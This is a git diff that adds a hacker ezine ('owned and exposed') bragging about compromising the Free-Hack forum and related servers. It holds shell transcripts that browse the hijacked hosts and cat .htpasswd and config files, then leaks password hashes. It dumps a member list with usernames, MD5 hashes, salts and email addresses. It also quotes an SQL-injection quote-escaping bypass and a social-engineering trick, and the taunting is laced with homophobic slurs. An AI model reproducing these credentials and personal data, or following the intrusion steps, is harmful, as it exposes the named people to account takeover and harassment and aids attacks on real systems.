"Location: $link "); + exit; +} + +elseif ($version=="bt4b") +{ + $iso="bt4-beta.iso"; + $link=choose($iso); +mysql_connect("localhost",$username,$password); +@mysql_select_db($database) or die( "Unable to select database"); +$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; +mysql_query($query); +mysql_close(); + header( "Location: $link "); + exit; +} + +elseif ($version=="bt4bvm") +{ + $iso="bt4-beta-vm-6.5.1.rar"; + $link=choose($iso); +mysql_connect("localhost",$username,$password); +@mysql_select_db($database) or die( "Unable to select database"); +$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; +mysql_query($query); +mysql_close(); + header( "Location: $link "); + exit; +} + +elseif ($version=="bt3") +{ + $iso="bt3-final.iso"; + $link=choose($iso); +mysql_connect("localhost",$username,$password); +@mysql_select_db($database) or die( "Unable to select database"); +$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; +mysql_query($query); +mysql_close(); + header( "Location: $link "); + exit; +} + +else +{ + exit; +} + +?> + + +$ cat s.php + + +$ cd wiki + +$ ls + +total 700 +drwxr-xr-x. 15 apache apache 4096 Nov 27 16:52 . +drwxr-xr-x. 13 apache apache 4096 Dec 9 12:21 .. +-rw-r--r--. 1 apache apache 23 Nov 14 16:01 .htpasswd +-rw-r--r--. 1 apache apache 17997 Apr 5 2006 COPYING +-rw-r--r--. 1 apache apache 2073 Jul 27 07:29 CREDITS +-rw-r--r--. 1 apache apache 76 Jul 27 2009 FAQ +-rw-r--r--. 1 apache apache 392287 Mar 12 2010 HISTORY +-rw-r--r--. 1 apache apache 96 Nov 14 16:01 HT +-rw-r--r--. 1 apache apache 4138 Apr 18 2008 INSTALL +-rw-r--r--. 1 apache apache 5469 Nov 28 16:45 LocalSettings.php +-rw-r--r--. 1 apache apache 3649 Nov 11 2008 README +-rw-r--r--. 1 apache apache 58431 Jul 28 03:11 RELEASE-NOTES +-rw-r--r--. 1 apache apache 648 May 7 2009 StartProfiler.sample +-rw-r--r--. 1 apache apache 13307 Mar 25 2010 UPGRADE +drwxr-xr-x. 2 root root 4096 Nov 27 16:53 adsense +-rw-r--r--. 1 apache apache 4707 Feb 15 2010 api.php +-rw-r--r--. 1 apache apache 25 Feb 3 2008 api.php5 +drwxr-xr-x. 2 apache apache 4096 Jul 28 03:16 bin +-rw-r--r--. 1 apache apache 8436 Nov 21 14:24 bt-wiki.png +drwxr-xr-x. 2 apache apache 4096 Jul 28 03:16 cache +drwxr-xr-x. 2 apache apache 4096 Nov 14 15:58 config +drwxr-xr-x. 4 apache apache 4096 Jul 28 03:16 docs +drwxr-xr-x. 4 apache apache 4096 Nov 28 16:44 extensions +drwxr-xr-x. 12 apache apache 4096 Nov 23 12:36 images +-rw-r--r--. 1 apache apache 4031 Oct 14 2009 img_auth.php +-rw-r--r--. 1 apache apache 31 Feb 3 2008 img_auth.php5 +drwxr-xr-x. 16 apache apache 4096 Jul 28 03:16 includes +-rw-r--r--. 1 apache apache 4329 Jan 1 2010 index.php +-rw-r--r--. 1 apache apache 28 Feb 3 2008 index.php5 +drwxr-xr-x. 4 apache apache 4096 Jul 28 03:16 languages +drwxr-xr-x. 13 apache apache 12288 Nov 22 12:55 maintenance +drwxr-xr-x. 2 apache apache 4096 Jul 28 03:16 math +-rw-r--r--. 1 apache apache 3054 Mar 21 2009 opensearch_desc.php +-rw-r--r--. 1 apache apache 39 Mar 3 2008 opensearch_desc.php5 +-rw-r--r--. 1 apache apache 174 Feb 3 2010 php5.php5 +-rw-r--r--. 1 apache apache 8821 Jul 27 03:40 profileinfo.php +-rw-r--r--. 1 apache apache 383 Mar 21 2009 redirect.php +-rw-r--r--. 1 apache apache 31 Feb 3 2008 redirect.php5 +-rw-r--r--. 1 apache apache 89 Feb 3 2010 redirect.phtml +drwxr-xr-x. 2 apache apache 4096 Jul 28 03:16 serialized +-rwxrwxrwx. 1 root root 6816 Nov 23 18:29 sitemap.xml +drwxr-xr-x. 9 apache apache 4096 Nov 28 14:12 skins +-rw-r--r--. 1 apache apache 4905 Mar 8 2010 thumb.php +-rw-r--r--. 1 apache apache 29 Feb 3 2008 thumb.php5 +-rw-r--r--. 1 apache apache 1347 Nov 5 2008 trackback.php +-rw-r--r--. 1 apache apache 32 Mar 16 2009 trackback.php5 +-rw-r--r--. 1 apache apache 86 Feb 3 2010 wiki.phtml + +$ cat .htpasswd +edbadmin:YE8mle4nG1Z.c + +cd .. +cat forums/includes/config.php + /proc/vz/vzaquota/00000045/aquota.group +lrwxrwxrwx 1 root root 38 Nov 30 02:12 aquota.user -> /proc/vz/vzaquota/00000045/aquota.user +drwx--x--x 3 root root 4096 Nov 13 09:00 backup +drwxr-xr-x 2 root root 4096 Nov 17 00:24 bin +drwxr-xr-x 2 root root 4096 Jan 26 2010 boot +drwxr-xr-x 7 root root 1900 Nov 30 02:12 dev +drwxr-xr-x 68 root root 12288 Dec 8 21:35 etc +drwx--x--x 8 root root 4096 Nov 14 07:11 home +drwxr-xr-x 9 root root 4096 Nov 12 08:24 lib +drwxr-xr-x 7 root root 4096 Nov 12 08:24 lib64 +drwxr-xr-x 2 root root 4096 Jan 26 2010 media +drwxr-xr-x 2 root root 4096 Jan 26 2010 mnt +drwxr-xr-x 10 root root 4096 Nov 12 16:31 opt +dr-xr-xr-x 113 root root 0 Nov 30 02:12 proc +drwxr-x--- 14 root root 4096 Dec 8 21:36 root +drwxr-xr-x 2 root root 4096 Nov 17 00:24 sbin +drwxr-xr-x 5 root root 20480 Dec 8 00:24 scripts +drwxr-xr-x 2 root root 4096 Jan 26 2010 selinux +drwxr-xr-x 2 root root 4096 Jan 26 2010 srv +drwxr-xr-x 3 root root 0 Nov 30 02:12 sys +drwxrwxrwt 10 root root 4096 Dec 8 21:36 tmp +drwxr-xr-x 16 root root 4096 Nov 11 18:17 usr +drwxr-xr-x 22 root root 4096 Nov 11 18:01 var + +$ ls -la /home/freehack/public_html +total 3100 +drwxr-x--- 34 freehack nobody 4096 Dec 4 22:13 . +drwx--x--x 14 freehack freehack 4096 Dec 7 11:15 .. +-rw-r--r-- 1 freehack freehack 1086 Dec 4 22:27 .htaccess +drwxr-xr-x 11 freehack freehack 4096 Nov 14 09:24 2tgh9322132k322l1sd +-rw-r--r-- 1 freehack freehack 6726 Jan 18 2010 LICENSE +drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 _private +drwxr-xr-x 4 freehack freehack 4096 Nov 14 08:28 _vti_bin +drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 _vti_cnf +drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 _vti_log +drwxr-x--- 2 freehack nobody 4096 Nov 14 07:11 _vti_pvt +drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 _vti_txt +-rw-r--r-- 1 freehack freehack 19341 Jan 18 2010 accessmask.php +-rw-r--r-- 1 freehack freehack 12687 Jan 18 2010 admin_rbs.php +-rw-r--r-- 1 freehack freehack 2645 Jan 18 2010 admin_rbs_banner_list.php +-rw-r--r-- 1 freehack freehack 3089 Jan 18 2010 admin_rbs_convert.php +-rw-r--r-- 1 freehack freehack 2667 Jan 18 2010 admin_rbs_d_banner_list.php +-rw-r--r-- 1 freehack freehack 2668 Jan 18 2010 admin_rbs_h_banner_list.php +-rw-r--r-- 1 freehack freehack 2668 Jan 18 2010 admin_rbs_v_banner_list.php +-rw-r--r-- 1 freehack freehack 2681 Jan 18 2010 admin_rbs_x_banner_list.php +-rw-r--r-- 1 freehack freehack 39582 Jan 18 2010 admincalendar.php +-rw-r--r-- 1 freehack freehack 49644 Jan 18 2010 admininfraction.php +-rw-r--r-- 1 freehack freehack 19150 Jan 18 2010 adminlog.php +-rw-r--r-- 1 freehack freehack 8149 Jan 18 2010 adminpermissions.php +-rw-r--r-- 1 freehack freehack 25516 Jan 18 2010 adminreputation.php +-rw-r--r-- 1 freehack freehack 1230 Jan 18 2010 ads.php +-rw-r--r-- 1 freehack freehack 23844 Jan 18 2010 ajax.php +-rw-r--r-- 1 freehack freehack 75511 Jan 18 2010 album.php +drwxrwxrwx 2 freehack freehack 4096 Nov 14 08:04 amecache +-rw-r--r-- 1 freehack freehack 17137 Jan 18 2010 announcement.php +drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:04 archive +-rw-r--r-- 1 freehack freehack 18309 Jan 18 2010 attachment.php +-rw-r--r-- 1 freehack freehack 12512 Jan 18 2010 attachmentpermission.php +-rw-r--r-- 1 freehack freehack 80983 Jan 18 2010 automediaembed_admin.php +-rw-r--r-- 1 freehack freehack 1979 Jan 18 2010 autorefresh_footer.php +-rw-r--r-- 1 freehack freehack 1979 Jan 18 2010 autorefresh_header.php +-rw-r--r-- 1 freehack freehack 1991 Jan 18 2010 autorefresh_navbar.php +-rw-r--r-- 1 freehack freehack 1430 Jan 18 2010 autotagger_ajax.php +-rw-r--r-- 1 freehack freehack 19355 Jan 18 2010 avatar.php +-rw-r--r-- 1 freehack freehack 46771 Jan 18 2010 banner.png +-rw-r--r-- 1 freehack freehack 16461 Jan 18 2010 bbcode.php +drwxr-xr-x 6 freehack freehack 4096 Nov 14 08:06 bilder +drwxr-xr-x 8 freehack freehack 4096 Nov 25 14:18 blog +-rw-r--r-- 1 freehack freehack 14782 Jan 18 2010 bookmarksite.php +-rw-r--r-- 1 freehack freehack 75327 Jan 18 2010 calendar.php +-rw-r--r-- 1 freehack freehack 12083 Jan 18 2010 calendarpermission.php +drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 cgi-bin +-rw-r--r-- 1 freehack freehack 43 Jan 18 2010 clear.gif +drwxr-xr-x 4 freehack freehack 4096 Nov 14 08:08 clientscript +drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:08 control_examples +-rw-r--r-- 1 freehack freehack 14938 Jan 18 2010 converse.php +drwxr-xr-x 3 freehack freehack 4096 Nov 18 14:14 cpa +drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:11 cpm +drwxr-xr-x 7 freehack freehack 4096 Nov 14 08:12 cpstyles +-rw-r--r-- 1 freehack freehack 3317 Jan 18 2010 cron.php +-rw-r--r-- 1 freehack freehack 24049 Jan 18 2010 cronadmin.php +-rw-r--r-- 1 freehack freehack 10734 Jan 18 2010 cronlog.php +-rw-r--r-- 1 freehack freehack 34087 Jan 18 2010 css.php +drwxrwxrwx 3 freehack freehack 4096 Nov 14 08:13 customavatars +drwxrwxrwx 3 freehack freehack 4096 Nov 14 08:13 customgroupicons +drwxrwxrwx 2 freehack freehack 4096 Nov 14 08:13 customprofilepics +-rw-r--r-- 1 freehack freehack 21833 Jan 18 2010 diagnostic.php +-rw-r--r-- 1 freehack freehack 47757 Jan 18 2010 editpost.php +-rw-r--r-- 1 freehack freehack 11748 Jan 18 2010 email.php +-rw-r--r-- 1 freehack freehack 29500 Jan 18 2010 external.php +-rw-r--r-- 1 freehack freehack 9786 Jan 18 2010 faq.php +-rw-r--r-- 1 freehack freehack 22486 Jan 18 2010 favicon.ico +-rw-r--r-- 1 freehack freehack 30137 Jan 18 2010 forum.php +-rw-r--r-- 1 freehack freehack 35658 Jan 18 2010 forumdisplay.php +-rw-r--r-- 1 freehack freehack 30063 Jan 18 2010 forumpermission.php +-rw-r--r-- 1 freehack freehack 15499 Oct 11 10:03 gla_test.php +-rw-r--r-- 1 freehack freehack 39830 Jan 18 2010 global.php +-rw-r--r-- 1 freehack freehack 53 Oct 24 14:48 googlef4001cc5b1db090b.html +-rw-r--r-- 1 freehack freehack 137885 Jan 18 2010 group.php +-rw-r--r-- 1 freehack freehack 24919 Jan 18 2010 group_inlinemod.php +-rw-r--r-- 1 freehack freehack 10524 Jan 18 2010 groupsubscription.php +-rw-r--r-- 1 freehack freehack 25922 Jan 18 2010 help.php +drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:13 htaccess +-rw-r--r-- 1 freehack freehack 9047 Jan 18 2010 image.php +drwxr-xr-x 20 freehack freehack 4096 Nov 14 08:51 images +drwxr-xr-x 5 freehack freehack 4096 Nov 14 08:52 img +drwxr-xr-x 7 freehack freehack 12288 Dec 4 22:09 includes +-rw-r--r-- 1 freehack freehack 19592 Jan 18 2010 index.php +-rw-r--r-- 1 freehack freehack 43829 Jan 18 2010 infraction.php +-rw-r--r-- 1 freehack freehack 182759 Jan 18 2010 inlinemod.php +-rw-r--r-- 1 freehack freehack 10342 Jan 18 2010 joinrequests.php +-rw-r--r-- 1 freehack freehack 10222 Jan 18 2010 login.php +drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:59 madp +-rw-r--r-- 1 freehack freehack 17066 Jan 18 2010 member.php +-rw-r--r-- 1 freehack freehack 15931 Jan 18 2010 member_inlinemod.php +-rw-r--r-- 1 freehack freehack 35901 Jan 18 2010 memberlist.php +-rw-r--r-- 1 freehack freehack 23867 Jan 18 2010 misc.php +-rw-r--r-- 1 freehack freehack 63331 Jan 18 2010 moderation.php +-rw-r--r-- 1 freehack freehack 6756 Jan 18 2010 moderator.php +-rw-r--r-- 1 freehack freehack 18477 Jan 18 2010 newattachment.php +-rw-r--r-- 1 freehack freehack 37104 Jan 18 2010 newreply.php +-rw-r--r-- 1 freehack freehack 18911 Jan 18 2010 newthread.php +-rw-r--r-- 1 freehack freehack 5725 Jan 18 2010 nex_stats_tend_classes.php +drwxr-xr-x 9 freehack freehack 4096 Nov 25 18:38 nopaste +-rw-r--r-- 1 freehack freehack 12095 Jul 20 15:01 oks.png +-rw-r--r-- 1 freehack freehack 19604 Jan 18 2010 online.php +-rw-r--r-- 1 freehack freehack 7696 Jan 18 2010 payment_gateway.php +-rw-r--r-- 1 freehack freehack 11910 Jan 18 2010 payments.php +-rw-r--r-- 1 freehack freehack 7889 Jan 18 2010 picture.php +-rw-r--r-- 1 freehack freehack 22040 Jan 18 2010 picture_inlinemod.php +-rw-r--r-- 1 freehack freehack 25311 Jan 18 2010 picturecomment.php +-rw-r--r-- 1 freehack freehack 27415 Jan 18 2010 poll.php +-rw-r--r-- 1 freehack freehack 17744 Jan 18 2010 post_thanks.php +-rw-r--r-- 1 freehack freehack 9512 Jan 18 2010 posthistory.php +-rw-r--r-- 1 freehack freehack 74369 Jan 18 2010 postings.php +-rw-r--r-- 1 freehack freehack 4763 Jan 18 2010 pprm.php +-rw-r--r-- 1 freehack freehack 6594 Jan 18 2010 printthread.php +-rw-r--r-- 1 freehack freehack 70748 Jan 18 2010 private.php +-rw-r--r-- 1 freehack freehack 152336 Jan 18 2010 profile.php +-rw-r--r-- 1 freehack freehack 2712 Feb 3 2010 rbs_banner.php +-rw-r--r-- 1 freehack freehack 39751 Jan 18 2010 register.php +-rw-r--r-- 1 freehack freehack 5688 Jan 18 2010 report.php +-rw-r--r-- 1 freehack freehack 13720 Jan 18 2010 reputation.php +-rw-r--r-- 1 freehack freehack 124717 Jan 18 2010 search.php +-rw-r--r-- 1 freehack freehack 20694 Jan 18 2010 sendmessage.php +-rw-r--r-- 1 freehack freehack 10009 Jan 18 2010 showgroups.php +-rw-r--r-- 1 freehack freehack 11374 Jan 18 2010 showpost.php +-rw-r--r-- 1 freehack freehack 73470 Jan 18 2010 showthread.php +drwxrwxrwx 2 freehack freehack 4096 Nov 14 08:59 signaturepics +drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:59 sitemap +-rw-r--r-- 1 freehack freehack 32848 Jan 18 2010 subscription.php +-rw-r--r-- 1 freehack freehack 51471 Sep 11 14:10 support.php +-rw-r--r-- 1 freehack freehack 13365 Jan 18 2010 tags.php +-rw-r--r-- 1 freehack freehack 8692 Jan 18 2010 threadrate.php +-rw-r--r-- 1 freehack freehack 12415 Jan 18 2010 threadtag.php +drwxrwxrwx 2 freehack freehack 4096 Dec 8 03:30 tmp +-rw-r--r-- 1 freehack freehack 34512 Jan 18 2010 usercp.php +-rw-r--r-- 1 freehack freehack 19098 Jan 18 2010 usernote.php +drwxrwxrwx 7 freehack freehack 4096 Nov 14 09:06 vboptimise +drwxr-xr-x 4 freehack freehack 4096 Dec 4 22:11 vbseo +-rw-r--r-- 1 freehack freehack 45172 Sep 14 01:00 vbseo.php +drwxr-xr-x 4 freehack freehack 4096 Nov 14 09:14 vbseo_sitemap +-rw-r--r-- 1 freehack freehack 4221 Sep 14 01:00 vbseocp.php +-rw-r--r-- 1 freehack freehack 27357 Jan 18 2010 visitormessage.php +-rw-r--r-- 1 freehack freehack 8431 Jan 18 2010 whoquotedme.php +-rw-r--r-- 1 freehack freehack 334 Oct 7 11:32 x.php + + +RETARDED PHP CODE ALERT! + +$ cat x.php + + + + +$ cd 2tgh9322132k322l1sd + +$ ls +total 252 +drwxr-xr-x 11 508 504 4096 Nov 14 09:24 . +drwxr-x--- 34 508 99 4096 Dec 4 22:13 .. +-rw-r--r-- 1 508 504 129 Nov 14 09:24 .htaccess +-rw-r--r-- 1 508 504 42 Nov 14 09:24 .htpasswd +drwxr-xr-x 2 508 504 4096 Nov 14 07:22 ReadMe +-rw-r--r-- 1 508 504 3661 Nov 14 09:20 config.php +-rw-r--r-- 1 508 504 58442 Sep 22 2009 config_overview.php +drwxr-xr-x 4 508 504 4096 Nov 14 07:16 css +-rw-r--r-- 1 508 504 19372 Sep 22 2009 dump.php +-rw-r--r-- 1 508 504 512 Nov 14 09:20 error_log +-rw-r--r-- 1 508 504 22059 Sep 22 2009 filemanagement.php +-rw-r--r-- 1 508 504 640 Sep 22 2009 help.php +drwxr-xr-x 2 508 504 4096 Nov 14 07:17 images +drwxr-xr-x 4 508 504 4096 Nov 14 07:18 inc +-rw-r--r-- 1 508 504 871 Sep 22 2009 index.php +-rw-r--r-- 1 508 504 24781 Sep 22 2009 install.php +drwxr-xr-x 4 508 504 4096 Nov 14 07:18 js +drwxr-xr-x 17 508 504 4096 Nov 14 07:22 language +-rw-r--r-- 1 508 504 5461 Sep 22 2009 log.php +-rw-r--r-- 1 508 504 1256 Sep 22 2009 main.php +-rw-r--r-- 1 508 504 3930 Sep 22 2009 menu.php +drwxr-xr-x 2 508 504 4096 Nov 14 07:22 msd_cron +-rw-r--r-- 1 508 504 776 Sep 22 2009 refresh_dblist.php +-rw-r--r-- 1 508 504 15762 Sep 22 2009 restore.php +-rw-r--r-- 1 508 504 10187 Sep 22 2009 sql.php +drwxr-xr-x 5 508 504 4096 Nov 14 07:22 tpl +drwxrwxrwx 5 508 504 4096 Nov 14 09:20 work + +$ cat .htpasswd +Suicide:$1$GTs9Hns/$lPMGV.EaLgyqwNxgTQSwf1 + +$ cat config.php +1000 +$config['processlist_refresh']=3000; + +$config['empty_db_before_restore']=0; +$config['optimize_tables_beforedump']=1; +$config['stop_with_error']=1; + +// For sending a mail after backup set send_mail to 1, otherless set to 0 +$config['send_mail']=0; +// Attach the backup 0=no 1=yes +$config['send_mail_dump']=0; +// set the recieve adress for the mail +$config['email_recipient']=''; +$config['email_recipient_cc']=''; +// set the sender adress (the script) +$config['email_sender']=''; + +//max. Size of Email-Attach, here 3 MB +$config['email_maxsize1']=3; +$config['email_maxsize2']=2; + +// FTP Server Configuration for Transfer +$config['ftp_transfer'][0]=0; +$config['ftp_timeout'][0]=30; +$config['ftp_useSSL'][0]=0; +$config['ftp_mode'][0]=0; +$config['ftp_server'][0]=''; // Adress of FTP-Server +$config['ftp_port'][0]='21'; // Port +$config['ftp_user'][0]=''; // Username +$config['ftp_pass'][0]=''; // Password +$config['ftp_dir'][0]=''; // Upload-Directory + +$config['ftp_transfer'][1]=0; +$config['ftp_timeout'][1]=30; +$config['ftp_useSSL'][1]=0; +$config['ftp_mode'][1]=0; +$config['ftp_server'][1]=''; +$config['ftp_port'][1]='21'; +$config['ftp_user'][1]=''; +$config['ftp_pass'][1]=''; +$config['ftp_dir'][1]=''; + +$config['ftp_transfer'][2]=0; +$config['ftp_timeout'][2]=30; +$config['ftp_useSSL'][2]=0; +$config['ftp_mode'][2]=0; +$config['ftp_server'][2]=''; +$config['ftp_port'][2]='21'; +$config['ftp_user'][2]=''; +$config['ftp_pass'][2]=''; +$config['ftp_dir'][2]=''; + +//Multipart 0=off 1=on +$config['multi_part']=0; +$config['multipartgroesse1']=1; +$config['multipartgroesse2']=2; +$config['multipart_groesse']=0; + +//Auto-Delete 0=off 1=on +$config['auto_delete']=0; +$config['max_backup_files']=3; + +//configuration file +$config['cron_configurationfile']='mysqldumper.conf.php'; +//path to perl, for windows use e.g. C:perlbinperl.exe +$config['cron_perlpath']='/usr/bin/perl'; +//mailer use sendmail(1) or SMTP(0) +$config['cron_use_sendmail']=1; +//path to sendmail +$sendmail_path=ini_get('sendmail_path'); +$config['cron_sendmail']=$sendmail_path>'' ? $sendmail_path: '/usr/lib/sendmail -t -oi -oem'; + +//adress of smtp-server +$config['cron_smtp']='localhost'; +//smtp-port +$config['cron_smtp_port']=25; +$config['cron_extender']=0; +$config['cron_compression']=1; +$config['cron_printout']=1; +$config['cron_completelog']=1; +$config['cron_comment']=''; +$config['multi_dump']=0; +$config['logcompression']=1; +$config['log_maxsize1']=1; +$config['log_maxsize2']=2; +$config['log_maxsize']=1048576; + + + ________________________ + | |_____ __ + | FREE-HACK LIST OF LAME | |__| |_________ + |________________________| |::| | / + /\**/\ | \.____|::|__| < +( o_o )_ | \::/ \._______\ + (u--u \_) | + (||___ )==\ +,dP"/b/=( /P"/b\ +|8 || 8\=== || 8 +`b, ,P `b, ,P + """` """` + +AlterHacker:edcb38409dd601b93c6af3219d112557:9R#:BlackMaster@gmx.de +fred777:50a1eab4c63175c910df92d870136e43:^"@:nebelfrost77@googlemail.com +N1GH7FIR3:20ddb5d76b23f7e77cf82c9da0f685ee:QpY:daemonhunter.mail@gmail.com +100:f97becbc6292ac264119ca57881f643c:a<":ttorben@mailde.de +Dexx:f59393b26641a10966b1400b17f20a93:e>>:dexx@free-hack.com +noctem:23b5d90e4e8047f014ed439b092da804:l4i:noctem-fh@web.de +Vitamin X:249bd491e1a2a4241babd149c021775b:-;3:vitaminxfh@mail.ru +sn0w:3c5bc3d3863c3d06246e9dbb3563a46c:YHI:iop.123@arcor.de +Apex:2d6725508c6f575996e99add1df75b78:#fj:micki5004@hotmail.com +Toastbrot:92c5d47cb95b30c60a007af44c8e433a:GG::r4z3r2@gmx.de +inyourface:d78cd66e4cb181741dbedb122a6abb4a:LD6:xyzdf8461@gmx.de +H4x0r007:b7db51f35436e5ae0d398c8617b148f6:"zD:h4x0r2@web.de +meckl:c23f739948b0a1a5b3ad225bdf355641:bNL:meckl@privatdemail.net +J0hn.X3r:5311479819ac7652223469f9eb6afbf9:7\D:J0hn.X3r@gmail.com +#b:07ff2d241ac7b8bfda85295ad74532db:@ce:bizzit@live.de +enco:d02abd58ba8ddaa4e009970ba2aa4531:iV(:enne@bk.ru +Lidloses_Auge:df8b7b3b4a3879b62b4fa36794907425:}5*:lidlosesauge@gmail.com +Rip:0b8ccc848ca2de26becdb26635112e5f:.5%:libary.source@googlemail.com +PoLe:8b1a2783236cba650ab671ef1e3b5d69:U!w:klogger@gmx.de +GrafZeppelin:96d74a9a16342e578feabb787f9c4b65:}$/:gray_foxde@yahoo.de +GODFATHER:6e2494acbfdf1a2c8f9bc4bc58c83ba1:AGe:Mighty.Mo89@Gmail.com +Qgel:c1f57278216436f781d102fa254a077b:'yV:kug3lblitz@gmail.com +DvdRom:a51a070617594bd6321bfde8ba5f5de4:=q$:dvd_rom123@hotmail.com +Suicide:c4944d15980260f4e446b679e1769395:]fL:followtheleader@bk.ru +novaca!ne:8ee3a88448d320961ff82e8f350e21cd:BuY:novacaine@privatdemail.net +ea$y:1a8ef8a801b84e16a5a344babe49287e:V-7:localserver@gaza.net +krypt0n:855801493f43e3c7b3471e50c2ee2e7e:fZr:hellyeahima@atheist.com + +We think that novaca!ne's magic_quotes bypass is quite representative +for this group: + +--snip snip-- + +Bypass magic_quotes (novaca!ne) +magic_quotes is a php setting (php.ini). +It causes that every ' (single-quote), " (double quote) and \ (backslash) +are escaped with a backslash automatically, a weak but wellknown securing method. +This is how to bypass it: +Use the funktion called „String.fromCharCode()“, you need to translate your MySQL command +into ascII (http://www.asciizeichen.de/tabelle.html) and put it input into the handling. +‘ OR ‘a’ = ‘a equals +String.fromCharCode(8216, 32, 79, 82, 32, 8216, 97, 8217, 32, 61, 32, 8216, 97) + +--snip snip-- + +novaca!ne is (next to fred777) of course, our new security superhero! +Congratz, faggot... + +Finally we shouldn't forget our old fag superhero fred777, who helped +us to understand how we could get every source code of a page. This +sounds pretty hard, but fred777 shows his priv8 techniques (we fear +them): + +--snip snip-- +######################################################### +# Sourcecode disclosure by social engineering +# tested on NPD +######################################################### + +Intro: +Ich schildere hier mal einen Fall, welchen ich letztens +noch vor mir hatte. Ich war durch Zufall mal wieder auf den +vielen NPD Seiten, um nach Lücken zu suchen. +Bei einer Subpage wurde ich dann auch fündig, zumindest erweckte +es den Anschein, als ob sich da eine SQL Injection befände. + +Sobald nämlich der Limitparameter falsch übergeben wurde, kam der +übliche SQL Error: + +--------------------------------------------------------- + +Rein logisch sah der Query so aus: + +SELECT `cats` FROM fred (sonstiges) LIMIT $_GET['la'],10; + +Als ich dann mittels eines Scripts versuchte den Query mit UNION +zu erweitern, wollte es aber nicht funktionieren. +Klar dafür konnte es so einige Gründe geben, allerdings hätte +ich mir zu gerne den Source + Abfragen angeschaut. + +--------------------------------------------------------- + +Wieso eigentlich nicht? + +Nach einigen Ãœberlegungen, schrieb ich dann eine Mail an den +Webmaster der Seite, mit dem Ziel, dass er mir den Source schickt. + +--snip snip-- + +What we learned is: +- If we write an email to an admin we always get the source code +- fred777 uses tools to exploit some sql injection + +"o_O", one of the banned users puts it nicely: "being lame is one of +fred777's master skills" Just to inform you: We owned Free-Hack with +this technique of course. + +TIME FOR SOME +______________________________________________________________________ +IlapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapsI +Isl_______l__slapslapslapsla_______a__lap__apslapslapslaps__pslap__apI +Ip| __| |.---.-.-----.| _ | |_| |_.---.-.----.| |--.| |aI +Ia|__ | || _ | _ || | _| _| _ | __|| < |__|lI +Il|_______|__||___._| __||___|___|____|____|___._|____||__|__||__|sI +Islapslapslapslapsla|__|pslapslapslapslapslapslapslapslapslapslapslapI +IpslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslaI + +Right, who deserves it? Correct! Suicide and enco for being badass +super high skilled computer professionals ... NOT + +This is a warning Free-Hack. Continue existing and we will show no +mercy. Especially you, J0hn.X3r. Take your chance, go and grow up. + +,_._._._._._._._|____________________________________________________ +|_|_|_|_|_|_|_|_|___________________________________________________/ + ~ last words ~ ! + +That's all for now. We hope that those we have owned understood the +warning and that those who already enjoyed issue one were satisfied +with this release. We will take a little break for now and go to +Hawaii to get our asses drunk. But do not fear. There will always be +enough time for us to audit more code, write more 0day and own more +idiots. We will always watch the scene and act if we are needed. There +is sill a lot to do and the winter of hax is not over yet. So do +expect us. + + |\ + /()/ + \| - the happy ninjas + ____________________________________________________|_._._._._._._._, + \___________________________________________________|_|_|_|_|_|_|_|_| + ! ~ OUTRO ~ + , + . | + / + \ I + / + \ .g88R_ + d888(` ). _ + - --==, 888( ),=-- .+(` )`. +) Y8P( '`, :( . ) + .+(`( , ) .-- `. ( ) ) + (( (..__,:'-' .=( ) ` _` ) ) +`. `( ) ) ( , ) ( ) ._ + ) ` __.:' ) ( ( )) `-',:ccee88oo, +) ) ( ) --' `- __,' ccC8O8O8Q8PoOb.o8oo +.-' (_,' ,') pqdOB69QOFFE4OpugoO9bD + .(_ ) CgggbbU8OU qOp qOdoUOdcb, + . , .3X4X5U2M/p u gcoUodpP + .\\\// /douUP +And shepherds we shall be, for thee my Lord for \\\////. (´`) +thee, power hath descended forth from thy hand, |||||. ,.(´ -.),. +that our feet may swiftly carry out thy command. |||/\, ( , ,) +We shall flow a river forth to thee, and teeming |||\/. `-´`´`´. +with souls shall it ever be. In nomine patris, |||||. +et filii, et spiritus sancti ,..,,.,.,....,,,,//||||\...,,,, +,...,...,..,...,,..,,.,.,..,,.,,,.,,,,,,,..,.,,,,...,.,.,...,,..,. +.,.,,,,..,..,.,..,,,,.,..,.,,.,..,..,,,,.,...,,..,,,..,..,....,..,..,. diff --git a/owned and exposed/3.txt b/owned and exposed/3.txt new file mode 100644 index 0000000..f140061 --- /dev/null +++ b/owned and exposed/3.txt @@ -0,0 +1,13117 @@ + |\___/| + -=[ISSUE - NO 3]=- =) ^Y^ (= + -=[OF]=- \ ^ / + )=*=( + ______________________________ __ ____________ _ / \ +|.-----.--.--.--.-----.-----.--| | ___ ___ _| || | | +|| _ | | | | | -__| _ | | . | | . || /| | | |\ +||_____|________|__|__|_____|_____| |__,|_|_|___|| \| | |_|/\ +| | | ______ |__//_// ___/ __ +| | | .-----.--.--.-----.| |.-----.--\_).--| || +| | | | -__|_ _| _ || || ||__ --| -__| _ || +| | | |_____|__.__| __|| || ||_____|_____|_____|| +|_/ \__________________________|__|___| || |___________________| + |______| + + Featuring... .---. /\ Brought to you by .---. + / . \ / \ your Happy Ninjas / . \ + |\_/| | | | |\_/| | + | | /| | b | | | /| + .-----------------------' | | a | .---------------------------' | + / .-. | | c | / .-. | +| / \ Intro | | k | | / \ The Happy Ninja Faker | +| |\_. | St0re.cc | | | | |\_. | Swissfaking.net | +|\| | /| El-Basar.biz | | | |\| | /| Vpn24.org | +| `---' | | | o | | `---' | | +| |------------------' | n | | |----------------------' +\ | .---. | c | \ | .---. + \ / / . \ | e | \ / / . \ + `---' |\_/| | | | `---' |\_/| | + | | /| | | | | /| + .-----------------------' | | a | .---------------------------' | + / .-. | | g | / .-. | +| / \ Undercover.su | | a | | / \ Secure-Host.in | +| |\_. | k!LLu's Botnet | | i | | |\_. | Unique-Crew.net | +|\| | /| | | n | |\| | /| | +| `---' | | | | | 